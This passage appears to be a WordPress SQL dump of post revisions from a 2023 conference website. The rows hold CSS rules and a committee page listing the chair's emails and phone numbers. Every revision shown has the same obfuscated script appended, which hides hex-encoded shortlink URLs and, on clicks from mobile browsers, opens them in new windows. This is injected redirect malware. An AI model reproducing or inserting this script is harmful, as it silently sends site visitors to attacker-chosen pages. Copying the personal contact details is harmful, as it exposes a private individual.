_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 09:01:02','2023-06-27 09:01:02','',4849,'https://gsw2023.com/?p=4874',0,'revision','',0),
(4876,4,'2023-06-27 09:01:38','2023-06-27 09:01:38','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 09:01:38','2023-06-27 09:01:38','',4823,'https://gsw2023.com/?p=4876',0,'revision','',0),
(4877,4,'2023-06-27 09:02:24','2023-06-27 09:02:24','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856532478{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" style=\"vc_box_rounded\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]\r\n\r\n<span style=\"font-size: 12pt;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 09:02:24','2023-06-27 09:02:24','',4849,'https://gsw2023.com/?p=4877',0,'revision','',0),
(4879,4,'2023-06-27 09:03:54','2023-06-27 09:03:54','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 